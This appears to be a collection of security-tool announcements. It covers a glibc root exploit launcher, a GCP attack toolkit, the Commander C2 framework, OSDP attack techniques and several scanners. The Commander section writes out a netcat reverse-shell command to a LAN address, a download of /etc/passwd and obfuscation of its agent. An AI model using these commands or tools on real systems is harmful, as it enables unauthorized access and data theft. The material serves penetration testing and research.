  • Exploitation Overview: Quickly identify which vulnerabilities are currently being exploited.
  • CVSS Scoring: Prioritize your patching efforts based on CVSS scores.
  • Categorized Overview: Get a breakdown of vulnerabilities based on their types.

Run PatchaPalooza without arguments to see an analysis of the current month's data:

python PatchaPalooza.py

For a specific month's analysis:

python PatchaPalooza.py --month YYYY-MMM

To display a detailed view of a specific CVE:

python PatchaPalooza.py --detail CVE-ID

To update and store the latest data:

python PatchaPalooza.py --update

For an overall statistical overview:

python PatchaPalooza.py --stats

  • Python 3.x
  • Requests library
  • Termcolor library

This tool is built upon the Microsoft's MSRC CVRF API and is inspired by the work of @KevTheHermit.

Alexander Hagenah

This tool is meant for educational and professional purposes only. No license, so do with it whatever you like.



LooneyPwner - Exploit Tool For CVE-2023-4911, Targeting The 'Looney Tunables' Glibc Vulnerability In Various Linux Distributions

By: Zion3R


Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.

LooneyPwner is a proof-of-concept (PoC) exploit tool targeting the critical buffer overflow vulnerability, nicknamed "Looney Tunables," found in the GNU C Library (glibc). This flaw, officially tracked as CVE-2023-4911, is present in various Linux distributions, posing significant risks, including unauthorized data access and system alterations.


The vulnerability in the GNU C Library (glibc) was disclosed last week, with notable security researchers and analysts releasing PoC exploits, indicating the potential for widespread attacks. The flaw, discovered by Qualys researchers, can grant attackers root privileges on various Linux distributions including Fedora, Ubuntu, and Debian.

Unauthorized root access provides attackers unrestricted authority, enabling them to:

  • Modify, delete, or steal sensitive data.
  • Install malicious software or backdoors.
  • Facilitate ongoing attacks that may remain undetected for extended periods.
  • Cause data breaches, accessing customer data, intellectual property, and financial records.
  • Disrupt critical system operations, potentially causing service outages and harming an organization's reputation.

LooneyPwner exploits the "Looney Tunables" flaw, targeting affected glibc versions. The tool:

  • Detects the installed glibc version.
  • Checks for vulnerability status.
  • Offers an option for exploitation if vulnerable.

chmod +x looneypwner.sh
./looneypwner.sh


This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.

This exploit code is based on the work of leesh3288. A big thanks to him for the foundational work on the exploit.



PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more. 


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category Primary Module Command Group Operation Description
User Authentication auth - activate Activate a Specific Authentication Method
- add Add a New Authentication Method
- delete Remove a Specific Authentication Method
- list List All Available Authentication Methods
Cloud Functions functions - list List All Deployed Cloud Functions
- permissions Display Permissions for a Specific Cloud Function
- triggers List All Triggers for a Specific Cloud Function
Cloud Storage storage buckets list List All Storage Buckets
permissions Display Permissions for Storage Buckets
Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



SecuSphere - Efficient DevSecOps

By: Zion3R


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run and the following dependencies

Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

By: Zion3R


JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


Prerequisites

Before installing JSpector, you need to have Jython installed on Burp Suite.

Installation

  1. Download the latest version of JSpector
  2. Open Burp Suite and navigate to the Extensions tab.
  3. Click the Add button in the Installed tab.
  4. In the Extension Details dialog box, select Python as the Extension Type.
  5. Click the Select file button and navigate to the JSpector.py.
  6. Click the Next button.
  7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

Usage

  • Just navigate through your targets and JSpector will start passively crawl JS files in the background and automatically returns the results on the Dashboard tab.
  • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW ITS SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



Sirius - First Truly Open-Source General Purpose Vulnerability Scanner

By: Zion3R


Sirius is the first truly open-source general purpose vulnerability scanner. Today, the information security community remains the best and most expedient source for cybersecurity intelligence. The community itself regularly outperforms commercial vendors. This is the primary advantage Sirius Scan intends to leverage.

The framework is built around four general vulnerability identification concepts: The vulnerability database, network vulnerability scanning, agent-based discovery, and custom assessor analysis. With these powers combined around an easy to use interface Sirius hopes to enable industry evolution.


Getting Started

To run Sirius clone this repository and invoke the containers with docker-compose. Note that both docker and docker-compose must be installed to do this.

git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker-compose up

Logging in

The default username and password for Sirius is: admin/sirius

Services

The system is composed of the following services:

  • Mongo: a NoSQL database used to store data.
  • RabbitMQ: a message broker used to manage communication between services.
  • Sirius API: the API service which provides access to the data stored in Mongo.
  • Sirius Web: the web UI which allows users to view and manage their data pipelines.
  • Sirius Engine: the engine service which manages the execution of data pipelines.

Usage

To use Sirius, first start all of the services by running docker-compose up. Then, access the web UI at localhost:5173.

Remote Scanner

If you would like to setup Sirius Scan on a remote machine and access it you must modify the ./UI/config.json file to include your server details.

Good Luck! Have Fun! Happy Hacking!



DakshSCRA - Source Code Review Assist

By: Zion3R


Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


Debut

Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

Features and Functionalities

Distinctive Features (Multiple World’s First)

  • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

  • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

  • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

  • Automated Scientific Effort Estimation for Code Review (World’s First): Providing a measurable approach for estimating efforts required for a code review process.

Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

Additionally, the tool offers the following functionalities:

  • Options to use platform-specific rules specific for finding areas of interests
  • Options to extend or add new rules for any new or existing languages
  • Generates report in text, HTML and PDF format for inspection

Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

Feel free to contribute towards updating or adding new rules and future development.

If you find any bugs, report them to d3basis.m0hanty@gmail.com.

Tool Setup

Pre-requisites

Python3 and all the libraries listed in requirements.txt

Setting up environment to run this tool

1. Setup a virtual environment

$ pip install virtualenv

$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv

$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate

After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

2. Ensure all required libraries are installed within the virtual environment

You must run the below command after activating the virtual environment as mentioned in the previous steps.

pip install -r requirements.txt

Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

Tool Usage

$ python3 dakshscra.py -h // To view avaialble options and arguments

usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review

Example Usage

$ python3 dakshscra.py // To view tool usage along with examples

Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshsca.py -r php -t /source_dir_path

# To override default settings, other filetypes can be specified with '-f' option.
dakshsca.py -r php -f dotnet -t /path_to_source_dir
dakshsca.py -r php -f custom -t /path_to_source_dir

# Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
dakshsca.py -recon -r php -t /path_to_source_dir

# Perform only reconnaissance if '-recon' used without the '-r' option.
dakshsca.py -recon -t /path_to_source_dir

# Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
dakshsca.py -r php -vv -t /path_to_source_dir


Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TY PES: dotnet, php, java, custom, allfiles

Reports

The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

Scanning (Areas of Security Concerns) Report

HTML Report:
  • DakshSCRA/reports/html/report.html
PDF Report:
  • DakshSCRA/reports/html/report.pdf
RAW TEXT Based Reports:
  • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
  • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
  • Identified Project Files: DakshSCRA/runtime/filepaths.txt

Reconnaissance (Recon) Report

  • Reconnaissance Summary: /reports/text/recon.txt

Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

Code Review Effort Estimation Report

  • Effort estimation report: /reports/html/estimation.html

Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



Mellon - OSDP Attack Tool

By: Zion3R


OSDP attack tool (and the Elvish word for friend)

Attack #1: Encryption is Optional

OSDP supports, but doesn't strictly require, encryption. So your connection might not even be encrypted at all. Attack #1 is just to passively listen and see if you can read the card numbers on the wire.

Attack #2: Downgrade Attack

Just because the controller and reader support encryption doesn't mean they're configured to require it be used. An attacker can modify the reader's capability reply message (osdp_PDCAP) to advertise that it doesn't support encryption. When this happens, some controllers will barrel ahead without encryption.

Attack #3: Install-mode Attack

OSDP has a quasi-official “install mode” that applies to both readers and controllers. As the name suggests, it’s supposed to be used when first setting up a reader. What it does is essentially allow readers to ask the controller for what the base encryption key (the SCBK) is. If the controller is configured to be persistently in install-mode, then an attacker can show up on the wire and request the SCBK.

Attack #4: Weak Keys

OSDP sample code often comes with hardcoded encryption keys. Clearly these are meant to be samples, where the user is supposed to generate keys in a secure way on their own. But this is not explained or made simple for the user, however. And anyone who’s been in security long enough knows that whatever’s the default is likely to be there in production.

So as an attack vector, when the link between reader and controller is encrypted, it’s worth a shot to enumerate some common weak keys. Now these are 128-bit AES keys, so we’re not going to be able to enumerate them all. Or even a meaningful portion of them. But what we can do is hit some common patterns that you see when someone hardcodes a key:

  • All single-byte values. [0x04, 0x04, 0x04, 0x04 …]
  • All monotonically increasing byte values. [0x01, 0x02, 0x03, 0x04, …]
  • All monotonically decreasing byte values. [0x0A, 0x09, 0x08, 0x07, …]

Attack #5: Keyset Capture

OSDP has no in-band mechansim for key exchange. What this means is that an attacker can:

  • Insert a covert listening device onto the wire.
  • Break / factory reset / disable the reader.
  • Wait for someone from IT to come and replace the reader.
  • Capture the keyset message (osdp_KEYSET) when the reader is first setup.
  • Decrypt all future messages.

Getting A Testbed Setup (Linux/MacOS)

You'll find proof-of-concept code for each of these attacks in attack_osdp.py. Checkout the --help command for more details on usage. This is a Python script, meant to be run from a laptop with USB<-->RS485 adapters like one of these. So you'll probably want to pick some of those up. Doesn't have to be that model, though.

If you have a controller you want to test, then great. Use that. If you don't, then we have an intentionally-vulnerable OSDP controller that you can use here: vulnserver.py.

Some of the attacks in attack_osdp.py will expect to be as a full MitM between a functioning reader and controller. To test these, you might need three USB<-->RS485 adapters, hooked together with a breadboard.

Additional Medium / Low Risk Issues

These issues are not, in isolation, exploitable but nonetheless represent a weakening of the protocol, implementation, or overall system.

  • MACs are truncated to 32 bits "to reduce overhead". This is very nearly (but not quite in our calculation) within practical exploitable range.
  • IVs (which are derived from MACs) are similarly reduced to 32 bits of entropy. This will cause IV reuse, which is a big red flag for a protocol.
  • Session keys are only generated using 48 bits of entropy from the controller RNG nonce. This appears to not be possible for an observing attacker to enumerate offline, however. (Unless we're missing something, in which case this would become a critical issue.)
  • Sequence numbers consist of only 2 bits, not providing sufficient liveness.
  • CBC-mode encryption is used. GCM would be a more modern block cipher mode appropriate for network protocols.
  • SCS modes 15 & 16 are essentially "null ciphers", and should not exist. They don't encrypt data.
  • The OSDP command byte is always unencrypted, even in the middle of a Secure Channel session. This is a huge benefit to attackers, making attack tools much easier to write. It means that an attacker can always see what "type" of packet is being sent, even if it's otherwise encrypted. Attackers can tell when people badge in, when the LED lights up, etc... This is not information that should be in plaintext.
  • SCBK-D (a hardcoded "default" encryption key) provides no security and should be removed. It serves only to obfuscate and provide a false sense of security.


Sekiryu - Comprehensive Toolkit For Ghidra Headless

By: Zion3R


This Ghidra Toolkit is a comprehensive suite of tools designed to streamline and automate various tasks associated with running Ghidra in Headless mode. This toolkit provides a wide range of scripts that can be executed both inside and alongside Ghidra, enabling users to perform tasks such as Vulnerability Hunting, Pseudo-code Commenting with ChatGPT and Reporting with Data Visualization on the analyzed codebase. It allows user to load and save their own script and interract with the built-in API of the script.


Key Features

  • Headless Mode Automation: The toolkit enables users to seamlessly launch and run Ghidra in Headless mode, allowing for automated and batch processing of code analysis tasks.

  • Script Repository/Management: The toolkit includes a repository of pre-built scripts that can be executed within Ghidra. These scripts cover a variety of functionalities, empowering users to perform diverse analysis and manipulation tasks. It allows users to load and save their own scripts, providing flexibility and customization options for their specific analysis requirements. Users can easily manage and organize their script collection.

  • Flexible Input Options: Users can utilize the toolkit to analyze individual files or entire folders containing multiple files. This flexibility enables efficient analysis of both small-scale and large-scale codebases.

Available scripts

